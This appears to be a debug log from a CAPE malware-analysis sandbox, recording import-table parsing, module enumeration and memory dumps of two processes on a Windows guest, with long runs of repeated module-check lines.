2020-03-24 10:13:36,881 [root] DEBUG: DumpProcessFixImports: Instantiating PeParser with address: 0x00B90000
2020-03-24 10:13:36,881 [root] DEBUG: DumpProcessFixImports: Module entry point VA is 0x00B91BCA
2020-03-24 10:13:36,881 [root] DEBUG: Module image dump success
2020-03-24 10:13:36,881 [root] DEBUG: DumpProcessFixImports: Found IAT - 0xb90ffc, size: 0x1ec
2020-03-24 10:13:36,897 [root] DEBUG: IAT parsing finished, found 116 valid APIs, missed 0 APIs
2020-03-24 10:13:36,897 [root] DEBUG: Adding module to module list: advapi32.dll
2020-03-24 10:13:36,897 [root] DEBUG: Adding module to module list: kernel32.dll
2020-03-24 10:13:36,897 [root] DEBUG: Adding module to module list: msvcrt.dll
2020-03-24 10:13:36,897 [root] DEBUG: Adding module to module list: ntdll.dll
2020-03-24 10:13:36,897 [root] DEBUG: Adding module to module list: user32.dll
2020-03-24 10:13:36,897 [root] DEBUG: Adding module to module list: ws2_32.dll
2020-03-24 10:13:36,911 [root] DEBUG: Adding module to module list: shlwapi.dll
2020-03-24 10:13:36,911 [root] DEBUG: Warning - IAT is not inside the PE image, requires rebasing.
2020-03-24 10:13:36,911 [root] DEBUG: Invalid PE file: import table rebuild failed.
2020-03-24 10:13:36,911 [root] DEBUG: Import table rebuild failed, falling back to unfixed dump.
2020-03-24 10:13:36,927 [root] INFO: Added new CAPE file to list with path: C:\uGrmFZ\CAPE\2192_4842881636132024232020
2020-03-24 10:13:36,959 [root] DEBUG: DoProcessDump: Full process memory dump saved to file: C:\uGrmFZ\memory\2192.dmp.
2020-03-24 10:13:36,959 [root] DEBUG: DLL unloaded from 0x75140000.
2020-03-24 10:13:36,959 [root] INFO: Notified of termination of process with pid 2192.
2020-03-24 10:13:36,974 [root] DEBUG: NtTerminateProcess hook: Attempting to dump process 1340
2020-03-24 10:13:36,974 [root] DEBUG: GetHookCallerBase: thread 2288 (handle 0x0), return address 0x4A1A7302, allocation base 0x4A1A0000.
2020-03-24 10:13:36,974 [root] DEBUG: DoProcessDump: Created dump file for full process memory dump: C:\uGrmFZ\memory\1340.dmp.
2020-03-24 10:13:37,006 [root] DEBUG: DumpInterestingRegions: Dumping Imagebase at 0x4A1A0000.
2020-03-24 10:13:37,006 [root] DEBUG: ApiReader: module list size: 20
2020-03-24 10:13:37,006 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,006 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,022 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:37,022 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:37,022 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,022 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,022 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,022 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,036 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,036 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,036 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,036 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,036 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,036 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,036 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,052 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,052 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,052 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,052 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,052 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,052 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,068 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,068 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,068 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,068 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,068 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,068 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,084 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,084 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,084 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,084 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,084 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,084 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,099 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,099 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,099 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,099 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,099 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,099 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,099 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,115 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,115 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,115 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,115 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,115 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,115 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,115 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,131 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,131 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,131 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,131 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,131 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,131 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,131 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,131 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,145 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,145 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,145 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,145 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,145 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,145 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,145 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,161 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,161 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,161 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,161 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,161 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,161 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,161 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,177 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,177 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,177 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\KernelBase.dll
2020-03-24 10:13:37,177 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\KernelBase.dll
2020-03-24 10:13:37,177 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,177 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,193 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,193 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,193 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,193 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,193 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,193 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,193 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,209 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,209 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,209 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,209 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,209 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,209 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,209 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,223 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,223 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,223 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,223 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,223 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,223 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,223 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,240 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,240 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,240 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,240 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,240 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,240 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,240 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,256 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,256 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,256 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,256 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,256 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,256 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,256 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,270 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,270 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,270 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,270 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,270 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,270 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,270 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,286 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,286 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,286 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,286 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,286 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,286 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,286 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,302 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,302 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,302 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,302 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,302 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,302 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,302 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,318 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,318 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:37,318 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:37,318 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\lpk.dll
2020-03-24 10:13:37,318 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\lpk.dll
2020-03-24 10:13:37,318 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\usp10.dll
2020-03-24 10:13:37,318 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\usp10.dll
2020-03-24 10:13:37,365 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\msvcrt.dll
2020-03-24 10:13:37,365 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\msvcrt.dll
2020-03-24 10:13:37,427 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\advapi32.dll
2020-03-24 10:13:37,427 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\advapi32.dll
2020-03-24 10:13:37,427 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,427 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,443 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,443 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\KernelBase.dll
2020-03-24 10:13:37,443 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,443 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,443 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,443 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,443 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,457 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,457 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,457 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,457 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,457 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,457 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,457 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,473 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,473 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,473 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\KernelBase.dll
2020-03-24 10:13:37,473 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,473 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,473 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,473 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,490 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,490 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,490 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,490 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,490 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,490 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,490 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,505 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,505 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,505 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\sechost.dll
2020-03-24 10:13:37,505 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sechost.dll
2020-03-24 10:13:37,505 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\rpcrt4.dll
2020-03-24 10:13:37,505 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\rpcrt4.dll
2020-03-24 10:13:37,505 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\rpcrt4.dll
2020-03-24 10:13:37,520 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\rpcrt4.dll
2020-03-24 10:13:37,520 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\rpcrt4.dll
2020-03-24 10:13:37,520 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\sspicli.dll
2020-03-24 10:13:37,520 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sspicli.dll
2020-03-24 10:13:37,520 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\cryptbase.dll
